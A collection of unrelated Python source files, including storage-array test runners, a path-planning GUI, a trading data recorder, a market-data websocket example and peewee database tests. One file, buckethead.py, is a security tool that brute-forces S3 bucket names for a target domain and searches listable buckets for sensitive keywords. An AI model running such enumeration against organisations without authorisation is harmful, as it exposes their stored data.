if len(re.findall(pattern_name, query)) == 1:
if 'name' in term:
if term['name'] == query:
search = term
else:
raise JiraOneErrors("value", "You cannot search with displayName, received 2 items only.")
return search
manage = UserManagement()
|
node_test.py
|
# (c) Copyright [2015] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from subprocess import Popen, PIPE
from threading import Thread
from Queue import Queue, Empty
import time
class NodeTest():
io_q = None
proc = None
errors_occurred = False
error_text = ''
test_result_text = ''
stream_open = True
def stream_watcher(self, identifier, stream):
for line in stream:
# block for 1 sec
self.io_q.put((identifier, line))
if not stream.closed:
self.stream_open = False
stream.close()
def printer(self):
while True:
try:
item = self.io_q.get(True, 1)
except Empty:
# no output in either stream for 1 sec so check if we are done
if self.proc.poll() is not None:
break
else:
identifier, line = item
if identifier is 'STDERR':
test_line = line.lower()
if 'failed' in test_line or 'error' in test_line:
self.errors_occurred = True
self.error_text += line
else:
self.test_result_text += line
def run_credentials_check_test(self, conf_data):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', 'ssh-credentials-check', '-f',
'json', '-conf-data', conf_data],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
def run_options_check_test(self, conf_data):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', '-v', 'options-check', '-f',
'json', '-conf-data', conf_data,
'-incl-system-info',
'-incl-replication-checks'],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
def run_software_check_test(self, conf_data, software_test_data):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', '-v', 'software-check', '-f', 'json',
'-conf-data', conf_data,
'-software-pkgs', software_test_data],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
def run_volume_paths_test(self, conf_data, os_vars, attached_volumes):
self.errors_occurred = False
self.error_text = ''
self.test_result_text = ''
self.io_q = Queue()
self.proc = Popen(['cinderdiags', '-v', 'volume-paths-check', '-f',
'json', '-conf-data', conf_data,
'-os-vars', os_vars,
'-attached-volumes', attached_volumes],
stdout=PIPE,
stderr=PIPE)
Thread(target=self.stream_watcher, name='stdout-watcher',
args=('STDOUT', self.proc.stdout)).start()
Thread(target=self.stream_watcher, name='stderr-watcher',
args=('STDERR', self.proc.stderr)).start()
Thread(target=self.printer, name='printer').start()
done = False
while not done:
time.sleep(2)
if self.proc.stdout.closed and self.proc.stderr.closed:
done = True
|
main.py
|
import json
import os
import tkinter
import threading
import numpy as np
from PIL import Image, ImageTk, ImageSequence
from model import PathPlanning
from optimizers import fit_value, fit_policy
from visualizations import plot_analysis
from utils import store_to_file
BASE_DIR = os.getcwd()
RESULTS_DIR = os.path.join(BASE_DIR, "results")
DATA_DIR = os.path.join(RESULTS_DIR, "txt_data")
os.mkdir(DATA_DIR)
def main(userInputData):
world_params = {
"cor_pr": 0.9,
"wr_pr": 0.0142857,
"n_actions": 8,
"goalReward": 1,
"obstReward": -15,
"stayReward": -0.03,
"gamma": 0.98,
}
world_params["maxRow"] = userInputData["maxRow"]
world_params["maxCol"] = userInputData["maxCol"]
world_params["num_obstacle_pts"] = userInputData["num_obstacle_pts"]
world_params["startRow"] = userInputData["startRow"]
world_params["startCol"] = userInputData["startCol"]
world_params["goalRow"] = userInputData["goalRow"]
world_params["goalCol"] = userInputData["goalCol"]
tm = PathPlanning(world_params)
tm.get_obstacles()
tm.build_map()
tm.build_st_trans_matrix()
tm.build_reward_matrix()
world_data = {}
world_data["st"] = tm.st.tolist()
world_data["rm"] = tm.rm.tolist()
world_data["gamma"] = tm.gamma
world_data["num_states"] = tm.num_states
world_data["startRow"] = tm.startRow
world_data["startCol"] = tm.startCol
world_data["goalRow"] = tm.goalRow
world_data["goalCol"] = tm.goalCol
world_data["oCol"] = tm.oCol
world_data["oRow"] = tm.oRow
world_data["m"] = tm.m.tolist()
world_data["maxRow"] = tm.maxRow
world_data["maxCol"] = tm.maxCol
os.chdir(DATA_DIR)
print("Storing PolicyIteration data to file")
store_to_file(world_data, "data_world.txt")
with open("data_world.txt") as json_data:
world_data = json.load(json_data)
world_data["st"] = np.array(world_data["st"])
world_data["rm"] = np.array(world_data["rm"])
world_data["m"] = np.array(world_data["m"])
# Policy Iteration Experimentations
print("Experiments with Policy Iteration")
data_policy = fit_policy(
world_data["st"],
world_data["rm"],
world_data["gamma"],
world_data["num_states"],
)
# Storing policy data to file
print("Storing PolicyIteration data to file")
store_to_file(data_policy, "data_policy.txt")
# Value Iteration Experimentations
print("Experiments with Value Iteration")
data_value = fit_value(
world_data["st"],
world_data["rm"],
world_data["gamma"],
world_data["num_states"],
)
# Storing value data to file
print("Storing ValueIteration data to file")
store_to_file(data_value, "data_value.txt")
# Showing plots
plot_analysis(
"data_world.txt",
"data_value.txt",
"data_policy.txt",
world_params["obstReward"],
)
def animate(canvas, root, sequence, image, counter):
canvas.itemconfig(image, image=sequence[counter])
root.after(
20,
lambda: animate(
canvas, root, sequence, image, (counter + 1) % len(sequence)
),
)
def loading():
temp = tkinter.Tk()
canvas = tkinter.Canvas(temp, width=400, height=400)
canvas.pack()
sequence = [
ImageTk.PhotoImage(img)
for img in ImageSequence.Iterator(Image.open(r"load.gif"))
]
image = canvas.create_image(200, 200, image=sequence[0])
animate(canvas, temp, sequence, image, 1)
temp.mainloop()
def threader(userinputData):
t1 = threading.Thread(target=loading)
t2 = threading.Thread(target=main, args=(userinputData,))
t2.start()
t1.start()
|
engine.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/10/28 0028 9:31
# @Author : Hadrianl
# @File : engine
import traceback
from typing import Optional
from vnpy.event import Event, EventEngine
from vnpy.trader.event import EVENT_TICK, EVENT_TRADE, EVENT_LOG
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.utility import load_json, save_json
from vnpy.trader.object import LogData
from vnpy.app.ib_cta_strategy.base import EVENT_CTA_LOG
from influxdb import InfluxDBClient
from threading import Thread
from queue import Queue, Empty
APP_NAME = "InfluxRecorder"
class InfluxRecorderEngine(BaseEngine):
""""""
setting_filename = "influx_recorder_setting.json"
db_name = "vnpy_record"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self._retry = 5
self.retention_policy_name = 'rt'
self.host = "localhost"
self.port = 8086
self.user = ""
self.password = ""
self.thread = Thread(target=self.run)
self.queue = Queue(100)
self.active = False
self.influx_client: Optional[InfluxDBClient] = None
self.handler = {
EVENT_TICK: self.process_tick_event,
EVENT_TRADE: self.process_trade_event,
EVENT_LOG: self.process_log_event,
EVENT_CTA_LOG: self.process_cta_log_event,
}
self.load_setting()
def run(self):
self.register_event()
while self.active:
try:
ev = self.queue.get(timeout=1)
self.handler[ev.type](ev)
except Empty:
continue
except Exception:
self.active = False
self.unregister_event()
def start_recorder(self, host, port, user, password):
""""""
self.influx_client = InfluxDBClient(host, port, user, password, self.db_name)
self.influx_client.ping()
self.influx_client.create_database(self.db_name)
self.influx_client.create_retention_policy(self.retention_policy_name, '7d', '1', shard_duration='1d')
self.active = True
self.thread.start()
def stop_recorder(self):
""""""
self.active = False
if self.thread.isAlive():
self.thread.join()
self.influx_client = None
def load_setting(self):
""""""
setting = load_json(self.setting_filename)
self.host = setting.get("host", self.host)
self.port = setting.get("port", self.port)
self.user = setting.get("user", self.user)
self.password = setting.get("password", self.password)
def save_setting(self):
""""""
setting = {
"host": self.host,
"port": self.port,
"user": self.user,
"password": self.password,
}
save_json(self.setting_filename, setting)
def register_event(self):
""""""
for k in self.handler:
self.event_engine.register(k, self.queue.put)
def unregister_event(self):
""""""
for k in self.handler:
self.event_engine.unregister(k, self.queue.put)
def process_tick_event(self, event: Event):
""""""
tickdata = event.data
ticks = [{
"measurement": "tick",
"tags": {
"symbol": tickdata.symbol,
"exchange": tickdata.exchange.value,
},
"fields": {
"last": float(tickdata.last_price),
"ask": float(tickdata.ask_price_1),
"bid": float(tickdata.bid_price_1),
"lastvol": float(tickdata.last_volume),
"askvol": float(tickdata.ask_volume_1),
"bidvol": float(tickdata.bid_volume_1),
"volume": tickdata.volume,
}
}]
self.influx_client.write_points(ticks, retention_policy=self.retention_policy_name)
def process_trade_event(self, event: Event):
""""""
tradedata = event.data
trades = [{
"measurement": "trade",
"tags": {
"symbol": tradedata.symbol,
"exchange": tradedata.exchange.value,
"direction": tradedata.direction.value,
},
"fields": {
"datetime": tradedata.datetime.strftime('%Y-%m-%dT%H:%M:%S'),
"price": tradedata.price,
"volume": tradedata.volume,
"orderRef": tradedata.orderRef,
"vt_orderid": tradedata.vt_orderid,
"vt_tradeid": tradedata.vt_tradeid,
}
}]
self.influx_client.write_points(trades, retention_policy=self.retention_policy_name)
def process_log_event(self, event: Event):
""""""
logdata = event.data
logs = [{
"measurement": "log",
"tags": {
"level": logdata.level,
},
"fields": {
"datetime": logdata.time.strftime('%Y-%m-%dT%H:%M:%S'),
"msg": logdata.msg,
}
}]
self.influx_client.write_points(logs, retention_policy=self.retention_policy_name)
def process_cta_log_event(self, event: Event):
""""""
logdata = event.data
logs = [{
"measurement": "cta_log",
"tags": {
"level": logdata.level,
},
"fields": {
"datetime": logdata.time.strftime('%Y-%m-%dT%H:%M:%S'),
"msg": logdata.msg,
}
}]
self.influx_client.write_points(logs, retention_policy=self.retention_policy_name)
def close(self):
""""""
self.active = False
if self.thread.isAlive():
self.thread.join()
|
buckethead.py
|
#!/usr/bin/env python3
# Author: Dwight Hohnstein, Rhino Security Labs (dwight.hohnstein@rhinosecuritylabs.com)
from subprocess import check_output, CalledProcessError
from os import devnull
import logging
import sys
import traceback
from optparse import OptionParser
from queue import Queue
from threading import Thread
from settings import S3_REGIONS
logging.basicConfig(filename='bucket-tally.log', level=logging.INFO)
bucket_q = Queue()
bucket_q_size = 0
# Bucketlist to sort buckets based on permissions.
bucketlist = {
"exists": [],
"listable": [],
}
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
def check_region_choice(regions):
"""
Check that the region passed to the script is valid. If all,
return all regions.
Args:
regions (str): Comma separated string of regions.
Returns:
list: List of AWS regions.
"""
regions = [x.strip() for x in regions.split(",")]
if "all" in regions:
return S3_REGIONS
elif not all(x in S3_REGIONS for x in regions):
# Not all regions passed to program are valid, raise error.
print("Invalid option passed for -r (--regions). Regions must be one or more of the following:")
print("all, {}".format(", ".join(S3_REGIONS)))
exit(1)
else:
# Every region passed is valid!
return regions
def create_bucket_list(domain, affixes=[]):
"""
Create a set of buckets based on a domain name and a list of affixes.
Note: This will be very large.
Args:
domain (str): Domain to add affixes to, such as google.com
regions (list): List of AWS regions to query against.
affixes (list): List of affixes to prefix and suffix to domain.
Returns:
set: Set of domain permutations.
Example:
> buckets = create_bucket_list("google.com", ["01"])
> buckets
["google.com", "google", "01.google.com", "01.google", "01-google",
"01google", "01google.com", "google-01", "google01"]
"""
perms = set()
# add domain
perms.add(domain)
rootword = ".".join(domain.split(".")[:-1])
# add rootword
perms.add(rootword)
for affix in affixes:
# affix.domain
perms.add("{}.{}".format(affix, domain))
# affix.rootword
perms.add("{}.{}".format(affix, rootword))
# affix-rootword
perms.add("{}-{}".format(affix, rootword))
# affixdomain
perms.add("{}{}".format(affix, domain))
# affixrootword
perms.add("{}{}".format(affix, rootword))
# rootword-affix
perms.add("{}-{}".format(rootword, affix))
# rootwordaffix
perms.add("{}{}".format(rootword, affix))
return perms
def bucket_worker():
"""
Wrapper to fetch items from queue and query s3
"""
while not bucket_q.empty():
region, bucket = bucket_q.get(timeout=5)
currcount = bucket_q_size - bucket_q.qsize()
percentile = round((float(currcount)/float(bucket_q_size))*100, 2)
print("Buckets searched: {}% ({}/{})".format(percentile, currcount, bucket_q_size), end="\r")
try:
ls_s3(region, bucket)
except CalledProcessError:
pass
bucket_q.task_done()
def ls_s3(region, domain):
"""
Takes a region and domain to query awscli and determine if the
bucket exists or is is listable. Pushes results to bucketlist
dictionary.
Args:
region (str): One of the AWS regions specified in settings.py
domain (str): Domain to target with s3://domain/
Returns:
None: No return value as it populates bucketlist
"""
fails = ["(InvalidBucketName)", "(NoSuchBucket)", "(PermanentRedirect)"]
exists = ["(AllAccessDisabled)", "(AccessDenied)", "(InvalidAccessKeyId)"]
cmd = "aws s3 ls s3://{}/ --region {}".format(domain, region)
# Redirect stdout to null
with open(devnull, 'w') as FNULL:
output = str(check_output(cmd.split(), stderr=FNULL))
logging.debug("Running command: {}".format(cmd))
logging.debug("Output was:\n{}".format(output))
if not any(x in output for x in fails):
info = (domain, region)
if any(x in output for x in exists):
bucketlist['exists'].append(info)
print("[E] {}{} {}on {}{} {}exists.\n".format(Y, domain, W, Y, region, W))
logging.info('[EXISTS] ' + cmd + "\n" + output + "\n" + "-"*10 + "\n")
else:
bucketlist['exists'].append(info)
bucketlist['listable'].append(info)
print("[L] {}{} {}on {}{} {}is listable.\n".format(G, domain, W, G, region, W))
logging.info("[LISTABLE] " + cmd + "\n" + output + "\n" + "-"*10 + "\n")
def main():
"""
Main function block that parses command line arguments.
"""
usage = "usage: %prog -d domain.com [-f keywords.txt -r region1,region2 -b" + \
"-t 30 -g keyword_file.txt -s [--subbrute]]"
parser = OptionParser(usage)
parser.add_option("-f", "--file", dest="filename", help="Read affixes from FILENAME.")
parser.add_option("-r", "--regions", dest="regions", default="all", help="Comma separated list " +
"of regions to query for bucket names. Default is all. Must be one or more of:" +
"{}".format(", ".join(S3_REGIONS)))
parser.add_option("-b", "--brute", dest="brute", action="store_true",
help="Use default brute force list in Buckets.txt")
parser.add_option("-t", "--threads", dest="threads", type="int", default=6,
help="Max number of threads, default is 6.")
parser.add_option("-g", "--grep", dest="grep",
help="Will recursively list files from buckets (when listable) and grep " +
"for keywords FILENAME. Ex: -g sensitive_keywords.txt")
parser.add_option("--sublist3r", dest="sublister", action="store_true", default=False,
help="Retrieve list of subdomains and use this to query against S3.")
parser.add_option("--subbrute", dest="subbrute", action="store_true", default=False,
help="Enable sublist3r's subbrute module when querying for subdomains.")
parser.add_option("-d", "--domain", dest="domain", help="Base domain to be queried against.")
parser.add_option("-v", "--verbose", dest="verbose", action="store_true", help="Enable debug messages in logs.")
(options, args) = parser.parse_args()
# Begin option parsing brick
# Set logging
if options.verbose:
logging.getLogger().setLevel(level=logging.DEBUG)
# Check regions passed are valid
regions = check_region_choice(options.regions)
# List of affixes to append to domain.com and domain in the form of
# affix.domain.com and affix-domain
affixes = []
# Subdomain var to keep track of sublist3r results.
subdomains = []
if not options.domain:
print("No argument -d (--domain) given. Please give a domain name, such as -d google.com")
exit(1)
# Read default keyword list if bruteforcing
if options.brute:
with open("Buckets.txt", "r") as f:
affixes += [x.strip() for x in f.readlines()]
# Read filename of user-provided keywords
if options.filename:
with open(options.filename, "r") as f:
affixes += [x.strip() for x in f.readlines()]
if options.sublister:
from Sublist3r import sublist3r
subdomains = sublist3r.main(options.domain, 30, None, None, False, verbose=True, enable_bruteforce=options.subbrute, engines=None)
buckets = create_bucket_list(options.domain, affixes=affixes)
for subdomain in subdomains:
subucks = create_bucket_list(subdomain, affixes=affixes)
buckets = buckets.union(subucks)
for region in regions:
for bucket in buckets:
bucket_q.put((region, bucket))
print("Generated {} bucket permutations. Beginning search across {} regions.".format(len(buckets), len(regions)))
print()
global bucket_q_size
bucket_q_size = bucket_q.qsize()
for i in range(options.threads):
t = Thread(target=bucket_worker, args=())
t.daemon = True
t.start()
bucket_q.join()
print()
print("[+] Results:")
print("\t{}Number of Buckets that Exist: {}{}".format(Y,len(bucketlist['exists']), W))
print("\t{}Number of Buckets that are Listable: {}{}".format(G,len(bucketlist['listable']), W))
if options.grep and bucketlist['listable']:
print("[.] Grepping for keywords in listable buckets from {}".format(options.grep))
with open(options.grep, 'r') as f:
keywords = [x.strip().lower() for x in f.readlines() if x.strip()]
for domain, region in bucketlist['listable']:
cmd = "aws s3 ls s3://{}/ --region {} --recursive".format(domain, region)
cmd = cmd.split(" ")
with open(devnull, 'w') as FNULL:
output = check_output(cmd, stderr=FNULL)
output = output.lower()
if any(x in output for x in keywords):
print("[!] Found sensitive file on bucket {} in region {}".format(domain, region))
if __name__ == "__main__":
main()
|
market_price_batch_view.py
|
#|-----------------------------------------------------------------------------
#| This source code is provided under the Apache 2.0 license --
#| and is provided AS IS with no warranty or guarantee of fit for purpose. --
#| See the project's LICENSE.md for details. --
#| Copyright (C) 2017-2020 Refinitiv. All rights reserved. --
#|-----------------------------------------------------------------------------
#!/usr/bin/env python
""" Simple example of outputting Market Price JSON data with Batch and View using Websockets """
import sys
import time
import getopt
import socket
import json
import websocket
import threading
from threading import Thread, Event
# Global Default Variables
hostname = '127.0.0.1'
port = '15000'
user = 'root'
app_id = '256'
position = socket.gethostbyname(socket.gethostname())
# Global Variables
web_socket_app = None
web_socket_open = False
def process_message(ws, message_json):
""" Parse at high level and output JSON of message """
message_type = message_json['Type']
if message_type == "Refresh":
if 'Domain' in message_json:
message_domain = message_json['Domain']
if message_domain == "Login":
process_login_response(ws, message_json)
elif message_type == "Ping":
pong_json = { 'Type':'Pong' }
ws.send(json.dumps(pong_json))
print("SENT:")
print(json.dumps(pong_json, sort_keys=True, indent=2, separators=(',', ':')))
def process_login_response(ws, message_json):
""" Send item request """
send_market_price_request(ws)
def send_market_price_request(ws):
""" Create and send simple Market Price batch request with view """
mp_req_json = {
'ID': 2,
'Key': {
'Name': [
'TRI.N',
'IBM.N',
'T.N'
],
},
'View': [
'BID',
'ASK',
'BIDSIZE'
]
}
ws.send(json.dumps(mp_req_json))
print("SENT:")
print(json.dumps(mp_req_json, sort_keys=True, indent=2, separators=(',', ':')))
def send_login_request(ws):
""" Generate a login request from command line data (or defaults) and send """
login_json = {
'ID': 1,
'Domain': 'Login',
'Key': {
'Name': '',
'Elements': {
'ApplicationId': '',
'Position': ''
}
}
}
login_json['Key']['Name'] = user
login_json['Key']['Elements']['ApplicationId'] = app_id
login_json['Key']['Elements']['Position'] = position
ws.send(json.dumps(login_json))
print("SENT:")
print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def on_message(ws, message):
""" Called when message received, parse message into JSON for processing """
print("RECEIVED: ")
message_json = json.loads(message)
print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))
for singleMsg in message_json:
process_message(ws, singleMsg)
def on_error(ws, error):
""" Called when websocket error has occurred """
print(error)
def on_close(ws, close_status_code, close_msg):
""" Called when websocket is closed """
global web_socket_open
web_socket_open = False
print("WebSocket Closed")
def on_open(ws):
""" Called when handshake is complete and websocket is open, send login """
print("WebSocket successfully connected!")
global web_socket_open
web_socket_open = True
send_login_request(ws)
if __name__ == "__main__":
# Get command line parameters
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "hostname=", "port=", "app_id=", "user=", "position="])
except getopt.GetoptError:
print('Usage: market_price_batch_view.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
sys.exit(2)
for opt, arg in opts:
if opt in ("--help"):
print('Usage: market_price_batch_view.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
sys.exit(0)
elif opt in ("--hostname"):
hostname = arg
elif opt in ("--port"):
port = arg
elif opt in ("--app_id"):
app_id = arg
elif opt in ("--user"):
user = arg
elif opt in ("--position"):
position = arg
# Start websocket handshake
ws_address = "ws://{}:{}/WebSocket".format(hostname, port)
print("Connecting to WebSocket " + ws_address + " ...")
web_socket_app = websocket.WebSocketApp(ws_address, on_message=on_message,
on_error=on_error,
on_close=on_close,
subprotocols=['tr_json2'])
web_socket_app.on_open = on_open
# Event loop
wst = threading.Thread(target=web_socket_app.run_forever)
wst.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
web_socket_app.close()
|
db_tests.py
|
from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import re
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import IS_CRDB
from .base import IS_MYSQL
from .base import IS_POSTGRESQL
from .base import IS_SQLITE
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import requires_postgresql
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
database = db_loader('sqlite3')
def test_pragmas(self):
self.database.cache_size = -2048
self.assertEqual(self.database.cache_size, -2048)
self.database.cache_size = -4096
self.assertEqual(self.database.cache_size, -4096)
self.database.foreign_keys = 'on'
self.assertEqual(self.database.foreign_keys, 1)
self.database.foreign_keys = 'off'
self.assertEqual(self.database.foreign_keys, 0)
def test_timeout_semantics(self):
self.assertEqual(self.database.timeout, 5)
self.assertEqual(self.database.pragma('busy_timeout'), 5000)
self.database.timeout = 2.5
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
self.database.close()
self.database.connect()
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
def test_pragmas_deferred(self):
pragmas = (('journal_mode', 'wal'),)
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
# Test pragmas preserved after initializing.
db.init(':memory:')
self.assertEqual(db._pragmas, pragmas)
db = SqliteDatabase(None)
self.assertEqual(db._pragmas, ())
# Test pragmas are set and subsequently overwritten.
db.init(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
db.init(':memory:', pragmas=())
self.assertEqual(db._pragmas, ())
# Test when specified twice, the previous value is overwritten.
db = SqliteDatabase(None, pragmas=pragmas)
db.init(':memory:', pragmas=(('cache_size', -8000),))
self.assertEqual(db._pragmas, (('cache_size', -8000),))
def test_pragmas_as_dict(self):
pragmas = {'journal_mode': 'wal'}
pragma_list = [('journal_mode', 'wal')]
db = SqliteDatabase(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
# Test deferred databases correctly handle pragma dicts.
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:')
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:', pragmas={})
self.assertEqual(db._pragmas, [])
def test_pragmas_permanent(self):
db = SqliteDatabase(':memory:')
db.execute_sql('pragma foreign_keys=0')
self.assertEqual(db.foreign_keys, 0)
db.pragma('foreign_keys', 1, True)
self.assertEqual(db.foreign_keys, 1)
db.close()
db.connect()
self.assertEqual(db.foreign_keys, 1)
def test_context_settings(self):
class TestDatabase(Database):
field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
operations = {'LIKE': '~', 'NEW': '->>'}
param = '$'
test_db = TestDatabase(None)
state = test_db.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], FIELD.INT)
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
self.assertEqual(state.operations['LIKE'], '~')
self.assertEqual(state.operations['NEW'], '->>')
self.assertEqual(state.operations['ILIKE'], 'ILIKE')
self.assertEqual(state.param, '$')
self.assertEqual(state.quote, '""')
test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
'INT': 'XXX_INT'})
state = test_db2.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], 'XXX_INT')
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
def test_connection_state(self):
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
self.database.close()
self.assertTrue(self.database.is_closed())
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
def test_db_context_manager(self):
self.database.close()
self.assertTrue(self.database.is_closed())
with self.database:
self.assertFalse(self.database.is_closed())
self.assertTrue(self.database.is_closed())
self.database.connect()
self.assertFalse(self.database.is_closed())
# Enter context with an already-open db.
with self.database:
self.assertFalse(self.database.is_closed())
# Closed after exit.
self.assertTrue(self.database.is_closed())
def test_connection_initialization(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
self.assertEqual(state['count'], 0)
conn = db.connection()
self.assertEqual(state['count'], 1)
# Since already connected, nothing happens here.
conn = db.connection()
self.assertEqual(state['count'], 1)
def test_connect_semantics(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
db.connect()
self.assertEqual(state['count'], 1)
self.assertRaises(OperationalError, db.connect)
self.assertEqual(state['count'], 1)
self.assertFalse(db.connect(reuse_if_open=True))
self.assertEqual(state['count'], 1)
with db:
self.assertEqual(state['count'], 1)
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
with db:
self.assertEqual(state['count'], 2)
def test_execute_sql(self):
self.database.execute_sql('CREATE TABLE register (val INTEGER);')
self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
(1337, 31337))
cursor = self.database.execute_sql(
'SELECT val FROM register ORDER BY val')
self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
self.database.execute_sql('DROP TABLE register;')
def test_bind_helpers(self):
db = get_in_memory_db()
alt_db = get_in_memory_db()
class Base(Model):
class Meta:
database = db
class A(Base):
a = TextField()
class B(Base):
b = TextField()
db.create_tables([A, B])
# Temporarily bind A to alt_db.
with alt_db.bind_ctx([A]):
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
self.assertTrue(A.table_exists())
self.assertTrue(B.table_exists())
alt_db.bind([A])
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
db.close()
alt_db.close()
def test_batch_commit(self):
class PatchCommitDatabase(SqliteDatabase):
commits = 0
def begin(self): pass
def commit(self):
self.commits += 1
db = PatchCommitDatabase(':memory:')
def assertBatches(n_objs, batch_size, n_commits):
accum = []
source = range(n_objs)
db.commits = 0
for item in db.batch_commit(source, batch_size):
accum.append(item)
self.assertEqual(accum, list(range(n_objs)))
self.assertEqual(db.commits, n_commits)
assertBatches(12, 1, 12)
assertBatches(12, 2, 6)
assertBatches(12, 3, 4)
assertBatches(12, 4, 3)
assertBatches(12, 5, 3)
assertBatches(12, 6, 2)
assertBatches(12, 7, 2)
assertBatches(12, 11, 2)
assertBatches(12, 12, 1)
assertBatches(12, 13, 1)
def test_server_version(self):
class FakeDatabase(Database):
server_version = None
def _connect(self):
return 1
def _close(self, conn):
pass
def _set_server_version(self, conn):
self.server_version = (1, 33, 7)
db = FakeDatabase(':memory:')
self.assertTrue(db.server_version is None)
db.connect()
self.assertEqual(db.server_version, (1, 33, 7))
db.close()
self.assertEqual(db.server_version, (1, 33, 7))
db.server_version = (1, 2, 3)
db.connect()
self.assertEqual(db.server_version, (1, 2, 3))
db.close()
def test_explicit_connect(self):
db = get_in_memory_db(autoconnect=False)
self.assertRaises(InterfaceError, db.execute_sql, 'pragma cache_size')
with db:
db.execute_sql('pragma cache_size')
self.assertRaises(InterfaceError, db.cursor)
class TestThreadSafety(ModelTestCase):
nthreads = 4
nrows = 10
requires = [User]
def test_multiple_writers(self):
def create_users(idx):
for i in range(idx * self.nrows, (idx + 1) * self.nrows):
User.create(username='u%d' % i)
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=create_users, args=(i,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(User.select().count(), self.nrows * self.nthreads)
def test_multiple_readers(self):
data = Queue()
def read_user_count(n):
for i in range(n):
data.put(User.select().count())
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=read_user_count,
args=(self.nrows,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(data.qsize(), self.nrows * self.nthreads)
class TestDeferredDatabase(BaseTestCase):
def test_deferred_database(self):
deferred_db = SqliteDatabase(None)
self.assertTrue(deferred_db.deferred)
class DeferredModel(Model):
class Meta:
database = deferred_db
self.assertRaises(Exception, deferred_db.connect)
query = DeferredModel.select()
self.assertRaises(Exception, query.execute)
deferred_db.init(':memory:')
self.assertFalse(deferred_db.deferred)
conn = deferred_db.connect()
self.assertFalse(deferred_db.is_closed())
DeferredModel._schema.create_all()
